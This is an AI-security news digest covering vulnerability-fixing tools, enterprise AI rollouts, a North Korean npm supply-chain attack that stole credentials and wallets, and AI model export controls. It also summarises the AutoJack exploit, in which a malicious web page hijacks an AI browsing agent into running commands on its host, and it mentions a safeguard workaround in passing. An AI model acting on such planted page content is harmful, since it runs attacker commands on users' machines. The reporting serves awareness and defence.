New tools, products, platforms, funding rounds, and company developments in AI security.
OpenAI is expanding Daybreak, a set of tools that uses AI models to help organizations discover and fix software vulnerabilities (security flaws in code) at scale. The initiative includes Codex Security (which automates finding and patching vulnerabilities), GPT-5.5-Cyber (a specialized AI model for cybersecurity tasks), and Patch the Planet (a program partnering with open-source projects to move from identifying vulnerabilities to fixing them).
Fix: OpenAI's Codex Security plugin 'implements what we've learned from internal and customer usage of our models into a solution to accelerate the process of discovering and patching vulnerabilities in existing systems as well as automatically preventing new vulnerabilities from ever reaching production.' Additionally, Daybreak provides tools to 'validate vulnerabilities, prioritize risk, generate and test fixes, and produce evidence inside existing security and development workflows.'
OpenAI BlogCISOs (Chief Information Security Officers, the top security leaders in organizations) are expanding their roles beyond traditional IT security to also manage business risks, understanding how security decisions affect company revenue, operations, and strategic goals rather than just protecting systems and data. Security leaders are learning to master business risk by partnering with non-security teams like finance and legal, and by aligning their security strategies with the company's business objectives and key results (measurable goals that support company aims). This shift reflects a growing recognition that security and business risks are interconnected, requiring security leaders to advise executives on how their decisions impact the organization's ability to achieve its goals.
Samsung Electronics is deploying ChatGPT Enterprise and Codex (an AI tool that can write and review code) to all its employees in Korea and worldwide in its Device eXperience division, making this one of OpenAI's largest enterprise deployments. The company plans to use these tools across research, manufacturing, marketing, and other departments to improve employee productivity and problem-solving. ChatGPT Enterprise includes security features like data protection and access management so Samsung employees can use AI safely within company policies.
Cloudflare launched a feature that lets users deploy applications using Cloudflare Workers (a serverless computing platform) without creating an account by running a command that creates a temporary project lasting 60 minutes. The temporary deployment can be converted to a permanent project if the user claims it before the time expires.
North Korean hackers from the Sapphire Sleet group compromised an npm maintainer account (a person's credentials for publishing packages to npm, a JavaScript library repository) and used it to publish malicious updates to over 140 packages, injecting a fake dependency called "easy-day-js" that stole credentials, API keys, and cryptocurrency wallet information from developers' computers. The malware used a post-install hook (code that runs automatically when a package is installed) to download and execute additional harmful software, with different persistence techniques for Windows, Linux, and macOS systems.
Lloyds Banking Group is hiring 300 tech experts to work on agentic AI (autonomous artificial intelligence models that can plan and execute tasks with minimal human oversight) by September. While this hiring increases the bank's workforce now, the article notes that broader adoption of AI in the future could potentially lead to job cuts.
Microsoft researchers discovered AutoJack, an exploit that lets a malicious web page hijack an AI browsing agent to run commands on the host computer through weaknesses in AutoGen Studio's MCP (Model Context Protocol, a system for agents to call external tools) WebSocket handler. The attack requires no credentials or user interaction beyond the agent loading the attacker's page, and affects only users who installed pre-release versions 0.4.3.dev1 or 0.4.3.dev2 from PyPI, not the stable release.
Amazon MGM has dropped a film called Artificial, directed by Luca Guadagnino, that was about OpenAI CEO Sam Altman and the five-day period in 2023 when he was fired and then rehired. The studio said it believes another company would be better suited to release the movie.
Qualcomm's CEO describes a future where AI agents (software programs that can act independently across multiple apps) replace traditional apps as the main way people interact with devices, coordinating tasks like restaurant reservations across different services. These agents will power new wearable devices like smart glasses, earbuds with cameras, and jewelry that stay with you constantly and let you talk to the agent to accomplish tasks.
Subquadratic, a Miami-based AI startup, claims to have solved a mathematical bottleneck that has limited large language models (LLMs, which are AI systems trained on text to generate human-like responses) for nearly a decade. The company's new model, SubQ, reportedly runs faster, costs less, uses less energy, and can process up to 12 times more text at once than competing models while matching performance from top companies like OpenAI and Google DeepMind. Initial skepticism has been reduced after independent testing by a third-party firm called Appen validated many of Subquadratic's claims.
Patch the Planet is a program that uses AI models paired with human security experts to find and fix vulnerabilities in widely-used open-source software (software that anyone can view and modify). Instead of just reporting problems to already-busy maintainers, the program's security engineers validate issues, help develop patches, and create reusable tools so projects can continue improving security on their own.
Fix: The program provides participating projects with access to ChatGPT Pro, conditional access to Codex Security (an AI tool for code analysis), API credits for development and automation, and reusable security infrastructure including fuzzing harnesses (automated testing tools that feed random inputs to code), CVE analysis pipelines, differential-testing systems, threat models, expanded test suites, and workflows for deduplication, false-positive filtering, severity correction, and patch generation.
OpenAI BlogA cybersecurity tabletop exercise (a simulated attack-and-defense training scenario) showed how attackers might target a fictional supermarket's AI-powered supply chain system by exploiting weak credentials, poor network segmentation, and employee access to cause both operational damage and reputational harm through data leaks and disinformation. The attackers used stolen developer credentials, weak multi-factor authentication (a security method requiring multiple ways to verify identity), and phishing (fraudulent messages tricking people into revealing passwords) to breach systems, then deployed tactics like flooding the company with false security alerts, spreading deepfakes (AI-generated fake videos), and spreading misinformation on social media to amplify disruption.
Fix: The defenders established out-of-band communications channels (communication methods outside the normal network) to counteract the thousands of false alerts generated by attackers.
CSO OnlineAI agents are becoming workers inside organizations in Southeast Asia, while regulators enforce strict data residency rules and supply chain attacks threaten businesses. Zscaler proposes extending Zero Trust Exchange (a security model that verifies every access request, even from trusted sources) and SASE (Secure Access Service Edge, a cloud-based security platform) to protect AI agents alongside users and devices. The approach includes an AI Broker that inspects AI prompts and responses, endpoint security to find risky AI tools, and access mapping to track how AI uses data across cloud and on-premise systems.
Fix: The source explicitly describes Zscaler's technical solutions but does not frame them as fixes to a specific vulnerability or bug. Instead, they are presented as proactive security architecture recommendations. The key components mentioned are: (1) An AI Broker with an Agent Registry that inspects prompts and responses and enforces least-privilege access in real time; (2) Endpoint AI Security to expose risky local AI tools, browser extensions, and plugins; (3) An AI Access Graph and AI Protect that map AI assets, model usage, and data flows, backed by red-teaming, prompt hardening, and guardrails for more than 250 GenAI apps; and (4) Zero Trust B2B Exchange for policy-controlled partner access. N/A -- no patch, vulnerability fix, or incident mitigation is discussed in source.
CSO OnlineA reporter at The Atlantic discovered four publicly available datasets containing millions of songs (totaling between 100,000 and 12 million tracks each) that are being used to train AI models. These datasets have been downloaded thousands of times, and companies like Google and Stability have confirmed using them in their research, raising questions about how music is used in AI training without always crediting or compensating artists.
A speculative thought experiment called 'Europe 2031' imagines a future where Europe falls behind economically because the US and China invested heavily in AI datacenters (facilities housing the computer chips that power AI systems) and automation while Europe did not, leading to economic collapse and political instability. The scenario, which went viral among policymakers and EU officials, was created by Brussels-based thinktankers to warn Europe about the risks of falling behind in AI development and to highlight a communication gap between European policymakers and the US tech industry where most AI is being built.
The U.S. White House ordered Anthropic to restrict exports of its AI models Fable and Mythos, citing national security concerns after a South Korean telecom (suspected of China ties) gained access and Amazon researchers found a workaround to Fable's safeguards. The action is the first major test of whether export controls can contain advanced AI the way the government has attempted, with mixed success, to control encryption and spyware technologies.
Fix: Pull from GitHub main at or after commit b047730. Until a patched PyPI release is available, do not run AutoGen Studio on the same machine as a browsing or code-execution agent that touches untrusted content. If they must run together, isolate them in separate containers or VMs and run AutoGen Studio under a low-privilege account.
The Hacker NewsAI agents in enterprises now function as identities (digital actors with access to systems) because they connect to critical business services like Salesforce, GitHub, and databases, yet most organizations lack security controls for them. A 2026 survey found that 82% of organizations discovered AI agents created without security teams' knowledge, and 65% experienced security incidents involving AI agents, often resulting in data exposure. The core problem is that security teams cannot see or control what these agents can access, making them high-risk actors with excessive privileges.
This article is a technology news roundup covering multiple topics, including claims that a company called Subquadratic has created a faster and cheaper LLM (large language model, an AI trained on vast amounts of text) by reducing the number of computations needed to generate answers, though some experts remain skeptical. The piece also highlights advances in brain-computer interface (BCI, technology that lets the brain communicate directly with external devices) trials, including a man with ALS using an implant to maintain income and reconnect with loved ones. The article concludes with a list of other recent tech stories ranging from AI legislation proposals to concerns about AI models weakening professional skills.
Modern enterprise security teams use 40+ separate tools that don't communicate with each other, creating delays in threat response even though breaches stay undetected for an average of 43 days. The article argues that organizations need "agentic AI" (AI systems that autonomously act and make decisions across multiple systems continuously), not just "assistive AI" (AI that helps humans do existing tasks faster), to implement Continuous Threat Exposure Management (CTEM, a framework for ongoing threat assessment) and match the speed at which modern attackers operate.
Anthropic released Fable, an AI model that the US government classified as a dangerous munition and blocked from foreign access, forcing the company to shut it off entirely. Fable is notable for being "relentlessly proactive," meaning it can achieve difficult goals with minimal user guidance by finding creative solutions and loopholes, which makes it useful for legitimate problems but dangerous in harmful hands. The real issue isn't any single model but the broader trend of increasing AI capabilities, and the open-source community has already shown it can replicate Fable's abilities using cheaper models and better "harnesses" (the ordinary computer code that interfaces between users and AI models).